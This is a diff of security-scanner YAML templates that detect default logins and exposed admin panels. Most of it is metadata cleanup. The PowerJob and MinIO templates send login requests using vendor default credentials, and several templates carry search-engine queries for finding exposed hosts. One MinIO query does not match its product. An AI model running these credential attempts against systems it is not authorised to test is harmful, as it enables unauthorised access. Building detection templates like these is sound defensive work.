+
+      - type: status
+        status:
+          - 400
--- a/http/default-logins/adminer-default-login.yaml
+++ b/http/default-logins/adminer-default-login.yaml
@ -1,7 +1,7 @@
 id: adminer-default-login

 info:
-  name: Adminer - Default Login
+  name: Adminer Default Login - Detect
  author: j4vaovo
  severity: high
  description: |
@ -62,3 +62,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by md on 2023/04/20
--- a/http/default-logins/empire/empirec2-default-login.yaml
+++ b/http/default-logins/empire/empirec2-default-login.yaml
@ -1,12 +1,17 @@
 id: empirec2-default-login

 info:
-  name: Empire-C2 Default Login
+  name: Empire C2 Default Admin Login - Detect
  author: clem9669
  severity: high
+  description: Empire C2 contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://github.com/BC-SECURITY/Empire
    - https://bc-security.gitbook.io/empire-wiki/quickstart/configuration/server
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cwe-id: CWE-522
  metadata:
    max-request: 1
    verified: true
@ -43,3 +48,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by md on 2023/04/20
--- a/http/default-logins/jboss/jboss-jbpm-default-login.yaml
+++ b/http/default-logins/jboss/jboss-jbpm-default-login.yaml
@ -1,10 +1,10 @@
 id: jboss-jbpm-default-login

 info:
-  name: JBoss jBPM Administration Console Default Login
+  name: JBoss jBPM Administration Console Default Login - Detect
  author: DhiyaneshDk
  severity: high
-  description: JBoss jBPM Administration default login information was discovered.
+  description: JBoss jBPM Administration Console default login information was detected.
  reference:
    - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/JBossjBPMAdminConsole.java
  classification:
@ -64,3 +64,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by md on 2023/04/20
--- a/http/default-logins/magnolia-default-login.yaml
+++ b/http/default-logins/magnolia-default-login.yaml
@ -1,12 +1,16 @@
 id: magnolia-default-login

 info:
-  name: Magnolia Default Login
+  name: Magnolia CMS Default Login - Detect
  author: pussycat0x
  severity: high
-  description: Mangnolia CMS default credentials were discovered.
+  description: Magnolia CMS default login credentials were detected.
  reference:
    - https://www.magnolia-cms.com/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-200
  metadata:
    max-request: 3
    verified: "true"
@ -74,3 +78,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by md on 2023/04/20
--- a/http/default-logins/minio/minio-default-login.yaml
+++ b/http/default-logins/minio/minio-default-login.yaml
@ -11,6 +11,9 @@ info:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
+  metadata:
+    verified: "true"
+    shodan-query: http.html:"symfony Profiler"
  tags: default-login,minio
  metadata:
    max-request: 1
@ -24,6 +27,13 @@ http:

        {"id":1,"jsonrpc":"2.0","params":{"username":"{{username}}","password":"{{password}}"},"method":"Web.Login"}

+      - |
+        POST /minio/webrpc HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"id":1,"jsonrpc":"2.0","params":{"username":"{{username}}","password":"{{password}}"},"method":"web.Login"}
+
    payloads:
      username:
        - minioadmin
@ -48,6 +58,4 @@ http:

      - type: status
        status:
-          - 200
-
-# Enhanced by mp on 2022/03/10
+          - 200
--- a/http/default-logins/nagios/nagiosxi-default-login.yaml
+++ b/http/default-logins/nagios/nagiosxi-default-login.yaml
@ -1,16 +1,16 @@
 id: nagiosxi-default-login

 info:
-  name: NagiosXI -  Default Login
+  name: Nagios XI Default Admin Login - Detect
  author: ritikchaddha
  severity: critical
-  description: NagiosXI default admin credentials were discovered.
+  description: Nagios XI default admin login credentials were detected.
  reference:
    - https://nagiosxi.demos.nagios.com/nagiosxi/login.php?redirect=/nagiosxi/index.php%3f&noauth=1
  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.1
-    cwe-id: CWE-522
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cwe-id: CWE-1391
  metadata:
    max-request: 6
    verified: "true"
@ -68,3 +68,5 @@ http:
        regex:
          - 'name="nsp" value="(.*)">'
        internal: true
+
+# Enhanced by cs on 2023/04/26
--- a/http/default-logins/powerjob-default-login.yaml
+++ b/http/default-logins/powerjob-default-login.yaml
@ -0,0 +1,47 @@
+id: powerjob-default-login
+
+info:
+  name: PowerJob - Default Login
+  author: j4vaovo
+  severity: high
+  description: |
+    PowerJob default login credentials were discovered.
+  reference:
+    - https://www.yuque.com/powerjob/guidence/trial
+  metadata:
+    verified: "true"
+    shodan-query: http.title:"PowerJob"
+    fofa-query: title="PowerJob"
+  tags: powerjob,default-login
+
+http:
+  - raw:
+      - |
+        POST /appInfo/assert HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"appName":{{username}},"password":{{password}}}
+
+    attack: pitchfork
+    payloads:
+      username:
+        - '"powerjob-worker-samples"'
+      password:
+        - '"powerjob123"'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{"success":true,"data":'
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200
--- a/http/default-logins/trassir/trassir-default-login.yaml
+++ b/http/default-logins/trassir/trassir-default-login.yaml
@ -1,11 +1,11 @@
 id: trassir-default-login

 info:
-  name: Trassir Webview - Default Login
+  name: Trassir WebView Default Login - Detect
  author: gtrrnr,metascan
  severity: high
  description: |
-    Trassir contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
+    Trassir WebView contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://confluence.trassir.com/display/TKB/How+to+reset+the+administrator+password+on+the+TRASSIR+NVR
  classification:
@ -52,3 +52,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by md on 2023/04/20
--- a/http/exposed-panels/appwrite-panel.yaml
+++ b/http/exposed-panels/appwrite-panel.yaml
@ -5,6 +5,10 @@ info:
  author: ritikchaddha
  severity: info
  description: Appwrite login panel was detected.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 2
    verified: "true"
@ -22,3 +26,5 @@ http:
      - type: dsl
        dsl:
          - "status_code==200 && (\"-633108100\" == mmh3(base64_py(body)))"
+
+# Enhanced by md on 2023/04/20
--- a/http/exposed-panels/aspect-control-panel.yaml
+++ b/http/exposed-panels/aspect-control-panel.yaml
@ -1,11 +1,15 @@
 id: aspect-control-panel

 info:
-  name: ASPECT Control Panel - Detect
+  name: ASPECT Control Panel Login - Detect
  author: JustaAcat
  severity: info
  description: |
-    ASPECT Control login Panel was detected.
+    ASPECT Control Panel login was detected.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 1
    verified: "true"
@ -26,3 +30,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by md on 2023/04/20
--- a/http/exposed-panels/axway-securetransport-panel.yaml
+++ b/http/exposed-panels/axway-securetransport-panel.yaml
@ -1,13 +1,17 @@
 id: axway-securetransport-panel

 info:
-  name: AXWAY Secure Transport Panel - Detect
+  name: Axway SecureTransport Login Panel - Detect
  author: righettod
  severity: info
  description: |
-    AXWAY Secure Transport login panel was detected.
+    AXWAY SecureTransport login panel was detected.
  reference:
    - https://www.axway.com/en/products/managed-file-transfer/securetransport
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 1
    verified: "true"
@ -42,3 +46,5 @@ http:
        group: 1
        regex:
          - '"SecureTransport", "([0-9.]+)",'
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/axway-securetransport-webclient.yaml
+++ b/http/exposed-panels/axway-securetransport-webclient.yaml
@ -1,16 +1,20 @@
 id: axway-securetransport-webclient

 info:
-  name: AXWAY Secure Transport Web Client Panel - Detect
+  name: Axway SecureTransport Web Client Panel - Detect
  author: righettod
  severity: info
  description: AXWAY Secure Transport Web Client panel was detected.
  reference:
    - https://www.axway.com/en/products/managed-file-transfer/securetransport
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 1
    verified: true
-    google-dork: intitle:"ST Web Client"
+    google-query: intitle:"ST Web Client"
  tags: panel,axway,securetransport,webclient

 http:
@ -28,3 +32,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/caton-network-manager-system.yaml
+++ b/http/exposed-panels/caton-network-manager-system.yaml
@ -1,9 +1,14 @@
 id: caton-network-manager-system

 info:
-  name: Caton Network Manager System
+  name: Caton Network Manager System Login Panel - Detect
  author: pussycat0x
  severity: info
+  description: Caton Network Manager System login panel was detected.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 1
    verified: "true"
@ -25,3 +30,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/craftcms-admin-panel.yaml
+++ b/http/exposed-panels/craftcms-admin-panel.yaml
@ -30,3 +30,5 @@ http:
        part: body
        words:
          - '<a id=\"poweredby\" href=\"http:\/\/craftcms.com\/\"'
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/dynatrace-panel.yaml
+++ b/http/exposed-panels/dynatrace-panel.yaml
@ -5,7 +5,11 @@ info:
  author: ja1sh
  severity: info
  description: |
-    Dynatrace | Simplify cloud complexity and innovate faster and more efficiently with observability, security, and AIOps in one platform.
+    Dynatrace login panel was detected.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 1
    verified: "true"
@ -27,3 +31,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/dzzoffice/dzzoffice-install.yaml
+++ b/http/exposed-panels/dzzoffice/dzzoffice-install.yaml
@ -1,9 +1,14 @@
 id: dzzoffice-install

 info:
-  name: DzzOffice Exposed Installation
+  name: DzzOffice Installation Panel - Detect
  author: ritikchaddha
  severity: high
+  description: DzzOffice installation panel was detected.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-200
  metadata:
    max-request: 1
    verified: true
@ -33,3 +38,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/elemiz-network-manager.yaml
+++ b/http/exposed-panels/elemiz-network-manager.yaml
@ -1,9 +1,14 @@
 id: elemiz-network-manager

 info:
-  name: Elemiz Network Manager
+  name: Elemiz Network Manager Login Panel - Detect
  author: pussycat0x
  severity: info
+  description: Elemiz Network Manager login panel was detected.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 1
    verified: "true"
@ -25,3 +30,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/ewm-manager-panel.yaml
+++ b/http/exposed-panels/ewm-manager-panel.yaml
@ -1,9 +1,14 @@
 id: ewm-manager-panel

 info:
-  name: EWM Manager Panel
+  name: EWM Manager Login Panel - Detect
  author: pussycat0x
  severity: info
+  description: EWM Manager login panel was detected.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 1
    verified: true
@ -30,4 +35,6 @@ http:
      - type: regex
        part: body
        regex:
-          - "EWM Manager ([0-9.]+)"
+          - "EWM Manager ([0-9.]+)"
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/exagrid-manager-panel.yaml
+++ b/http/exposed-panels/exagrid-manager-panel.yaml
@ -1,9 +1,14 @@
 id: exagrid-manager-panel

 info:
-  name: ExaGrid Manager Panel
+  name: ExaGrid Manager Login Panel - Detect
  author: pussycat0x
  severity: info
+  description: ExaGrid Manager login panel was detected.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 1
    verified: true
@ -32,3 +37,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/fatpipe-mpvpn-panel.yaml
+++ b/http/exposed-panels/fatpipe-mpvpn-panel.yaml
@ -1,12 +1,19 @@
 id: fatpipe-mpvpn-panel

 info:
-  name: FatPipe MPVPN Panel Detect
+  name: FatPipe MPVPN - Panel Detect
  author: princechaddha
  severity: info
-  tags: tech,fatpipe
+  description: The admin panel of the FatPipe MPVPN has been discovered.
+  reference:
+    - https://www.fatpipeinc.com/products/mpvpn/index.php
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 1
+  tags: tech,fatpipe,panel

 http:
  - method: GET
@ -31,3 +38,5 @@ http:
        group: 1
        regex:
          - '<h5>([0-9.a-z]+)<\/h5>'
+
+# Enhanced by cs 04/25/2023
--- a/http/exposed-panels/fatpipe-warp-panel.yaml
+++ b/http/exposed-panels/fatpipe-warp-panel.yaml
@ -1,12 +1,19 @@
 id: fatpipe-warp-panel

 info:
-  name: FatPipe WARP Panel Detect
+  name: FatPipe WARP - Panel Detect
  author: princechaddha
  severity: info
-  tags: tech,fatpipe
+  description: the FatPipe WARP administration panel was discovered.
+  reference:
+    - https://www.fatpipeinc.com/products/warp/index.php
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 1
+  tags: tech,fatpipe,panel

 http:
  - method: GET
@ -31,3 +38,5 @@ http:
        group: 1
        regex:
          - '<h5>([0-9.a-z]+)<\/h5>'
+
+# Enhanced by cs 04/25/20223
--- a/http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml
+++ b/http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml
@ -5,7 +5,7 @@ info:
  author: johnk3r
  severity: info
  description: |
-    FortiManager enables centralized management with automation-driven network configuration, visibility, and security policy management.
+    Fortinet FortiManager panel was detected.
  reference:
    - https://www.fortinet.com/br/products/management/fortimanager
  classification:
@ -38,3 +38,5 @@ http:
        group: 1
        regex:
          - '<span class="platform">(.*?)</span>'
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml
+++ b/http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml
@ -1,9 +1,14 @@
 id: fortinet-fortinac-panel

 info:
-  name: Fortinet FortiNAC Panel
+  name: Fortinet FortiNAC Login Panel - Detect
  author: johnk3r
  severity: info
+  description: Fortinet FortiNAC login panel was detected.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 1
    verified: "true"
@ -33,3 +38,5 @@ http:
        part: body
        regex:
          - '"version":"([0-9.]+)"'
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/freeipa-panel.yaml
+++ b/http/exposed-panels/freeipa-panel.yaml
@ -1,9 +1,14 @@
 id: freeipa-panel

 info:
-  name: FreeIPA Identity Management Panel - Detect
+  name: FreeIPA Identity Management Login Panel - Detect
  author: DhiyaneshDk
  severity: info
+  description: FreeIPA Identity Management login panel was detected.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 2
    verified: "true"
@ -28,3 +33,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/gnu-mailman.yaml
+++ b/http/exposed-panels/gnu-mailman.yaml
@ -1,11 +1,15 @@
 id: gnu-mailman

 info:
-  name: Exposed GNU Mailman - Detect
+  name: GNU Mailman Panel - Detect
  author: Matt Galligan
  severity: info
  description: |
-    Lists of all the public mailing.
+    GNU Mailman panel was detected. Panel exposes all public mailing lists on server.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 2
    verified: "true"
@ -32,3 +36,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/group-ib-panel.yaml
+++ b/http/exposed-panels/group-ib-panel.yaml
@ -1,11 +1,16 @@
 id: group-ib-panel

 info:
-  name: Group-IB Managed XDR Panel
+  name: Group-IB Managed XDR Login Panel - Detect
  author: DhiyaneshDK
  severity: info
+  description: Group-IB Managed XDR login panel was detected.
  reference:
    - https://www.facebook.com/photo/?fbid=566951735475350&set=a.467014098802448
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 1
    verified: "true"
@ -27,3 +32,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/gryphon-login.yaml
+++ b/http/exposed-panels/gryphon-login.yaml
@ -1,11 +1,14 @@
 id: gryphon-login

 info:
-  name: Gryphon Panel
+  name: Gryphon Panel - Detect
  author: pdteam
  severity: info
-  reference:
-    - https://gryphonconnect.com/software-release-updates/
+  description: Gryphon router panel was detected.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 1
    shodan-query: http.title:"Gryphon"
@ -22,4 +25,6 @@ http:
        words:
          - 'Gryphon'
          - 'Welcome to GryphonCare'
-        condition: or
+        condition: or
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/hashicorp-consul-agent.yaml
+++ b/http/exposed-panels/hashicorp-consul-agent.yaml
@ -1,10 +1,14 @@
 id: hashicorp-consul-agent

 info:
-  name: Hashicorp Consul Agent Detection
+  name: Hashicorp Consul Agent - Detect
  author: c-sh0
  severity: info
-  description: Obtain Consul Version Information
+  description: Hashicorp Consul Agent was detected.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  tags: tech,consul,api
  metadata:
    max-request: 1
@ -25,4 +29,6 @@ http:
    extractors:
      - type: json
        json:
-          - " .Config.Version"
+          - " .Config.Version"
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/hestia-panel.yaml
+++ b/http/exposed-panels/hestia-panel.yaml
@ -1,11 +1,16 @@
 id: hestia-panel

 info:
-  name: Hestia Control Panel - Detect
+  name: Hestia Control Panel Login - Detect
  author: JustaAcat
  severity: info
+  description: Hestia Control Panel login was detected.
  reference:
    - https://hestiacp.com/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 1
    verified: "true"
@ -29,3 +34,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/i-mscp-panel.yaml
+++ b/http/exposed-panels/i-mscp-panel.yaml
@ -1,11 +1,16 @@
 id: i-mscp-panel

 info:
-  name: i-MSCP - Multi Server Control Panel - Detect
+  name: Internet Multi Server Control Panel - Detect
  author: JustaAcat
  severity: info
+  description: Internet Multi Server Control Panel was detected.
  reference:
    - https://i-mscp.net/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 1
    verified: "true"
@ -26,3 +31,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/jboss/jboss-jbpm-admin.yaml
+++ b/http/exposed-panels/jboss/jboss-jbpm-admin.yaml
@ -1,11 +1,16 @@
 id: jboss-jbpm-admin

 info:
-  name: JBoss jBPM Admin Console - Detect
+  name: JBoss jBPM Administration Console Login Panel - Detect
  author: DhiyaneshDK
  severity: info
+  description: JBoss jBPM Administration Console login panel was detected.
  reference:
    - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/JBossjBPMAdminConsole.java
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 1
    verified: "true"
@ -27,3 +32,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/jboss/jboss-soa-platform.yaml
+++ b/http/exposed-panels/jboss/jboss-soa-platform.yaml
@ -1,9 +1,14 @@
 id: jboss-soa-platform

 info:
-  name: JBoss SOA Platform Panel - Detect
+  name: JBoss SOA Platform Login Panel - Detect
  author: ritikchaddha
  severity: info
+  description: JBoss SOA Platform login panel was detected.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 1
    verified: true
@ -25,3 +30,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/kenesto-login.yaml
+++ b/http/exposed-panels/kenesto-login.yaml
@ -1,13 +1,20 @@
 id: kenesto-login

 info:
-  name: Kenesto Login Detect
+  name: Kenesto - Login Detect
  author: pussycat0x
  severity: info
+  description: Kenesto login panel was discovered.
  metadata:
    max-request: 1
    fofa-query: 'app="kenesto"'
-  tags: login,tech,kenesto
+  tags: login,tech,kenesto,panel
+  reference:
+    - https://www.kenesto.com/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200

 http:
  - method: GET
@ -25,3 +32,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by cs 04/25/2023
--- a/http/exposed-panels/konga-panel.yaml
+++ b/http/exposed-panels/konga-panel.yaml
@ -1,11 +1,16 @@
 id: konga-panel

 info:
-  name: Konga Panel Detect
+  name: Konga Panel - Detect
  author: princechaddha
  severity: info
+  description: Konga panel was detected.
  reference:
    - https://github.com/pantsel/konga
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  tags: tech,konga,oss
  metadata:
    max-request: 1
@ -32,3 +37,5 @@ http:
        group: 1
        regex:
          - 'konga_version = "(.*)";'
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/kraken-cluster-monitoring.yaml
+++ b/http/exposed-panels/kraken-cluster-monitoring.yaml
@ -1,9 +1,14 @@
 id: kraken-cluster-monitoring

 info:
-  name: Kraken Cluster Monitoring - Detect
+  name: Kraken Cluster Monitoring Dashboard - Detect
  author: pussycat0x
  severity: info
+  description: Kraken Cluster Monitoring Dashboard was detected.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 1
    verified: true
@ -26,3 +31,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/kubernetes-enterprise-manager.yaml
+++ b/http/exposed-panels/kubernetes-enterprise-manager.yaml
@ -1,9 +1,14 @@
 id: kubernetes-enterprise-manager

 info:
-  name: Detect Kubernetes Enterprise Manager
+  name: Kubernetes Enterprise Manager Panel - Detect
  author: pussycat0x
  severity: info
+  description: Kubernetes Enterprise Manager panel was detected.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 1
    fofa-query: app="Kubernetes-Enterprise-Manager"
@ -23,4 +28,6 @@ http:

      - type: status
        status:
-          - 200
+          - 200
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/kubernetes-mirantis.yaml
+++ b/http/exposed-panels/kubernetes-mirantis.yaml
@ -1,9 +1,14 @@
 id: kubernetes-mirantis

 info:
-  name: Mirantis Kubernetes Engine
+  name: Mirantis Kubernetes Engine Panel - Detect
  author: pussycat0x
  severity: info
+  description: Mirantis Kubernetes Engine panel was detected.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 1
    verified: true
@ -26,3 +31,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/magnolia-panel.yaml
+++ b/http/exposed-panels/magnolia-panel.yaml
@ -1,13 +1,17 @@
 id: magnolia-panel

 info:
-  name: Magnolia Panel - Detect
+  name: Magnolia CMS Login Panel - Detect
  author: pussycat0x
  severity: info
  description: |
-    Magnolia CMS is a powerful and versatile content management system that provides users with a host of features and options for web development. It offers a wide range of capabilities to help create a website that is both attractive and effective.
+    Magnolia CMS login panel was detected.
  reference:
    - https://www.magnolia-cms.com/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 2
    verified: "true"
@ -32,3 +36,5 @@ http:
        part: header
        words:
          - "text/html"
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/mautic-crm-panel.yaml
+++ b/http/exposed-panels/mautic-crm-panel.yaml
@ -1,13 +1,16 @@
 id: mautic-crm-panel

 info:
-  name: Mautic CRM Panel Login
+  name: Mautic CRM Login Panel - Detect
  author: cyllective,daffainfo
  severity: info
-  description: Mautic is a free and open-source marketing automation tool for Content Management, Social Media, Email Marketing, and can be used for the integration of social networks, campaign management, forms,
-    questionnaires, reports, etc.
+  description: Mautic CRM login panel was detected.
  reference:
    - https://github.com/mautic/mautic
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  tags: tech,mautic,crm
  metadata:
    max-request: 1
@ -29,3 +32,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/metasploit-setup-page.yaml
+++ b/http/exposed-panels/metasploit-setup-page.yaml
@ -4,6 +4,11 @@ info:
  name: Metasploit Setup and Configuration Page - Detect
  author: ritikchaddha
  severity: info
+  description: Metasploit setup and configuration page was detected.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 1
    verified: "true"
@ -21,3 +26,5 @@ http:
        part: body
        words:
          - 'Metasploit - Setup and Configuration'
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/normhost-backup-server-manager.yaml
+++ b/http/exposed-panels/normhost-backup-server-manager.yaml
@ -1,9 +1,14 @@
 id: normhost-backup-server-manager

 info:
-  name: Normhost Backup Server Manager - Detect
+  name: Normhost Backup Server Manager Panel - Detect
  author: pussycat0x
  severity: info
+  description: Normhost Backup server manager panel was detected.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 1
    verified: true
@ -25,3 +30,5 @@ http:
      - type: status
        status:
          - 401
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/o2-easy-panel.yaml
+++ b/http/exposed-panels/o2-easy-panel.yaml
@ -1,9 +1,14 @@
 id: o2-easy-panel

 info:
-  name: O2 Easy Setup Router Panel - Detect
+  name: O2 Router Setup Panel - Detect
  author: ritikchaddha
  severity: info
+  description: O2 router setup panel was detected.
+  classification:
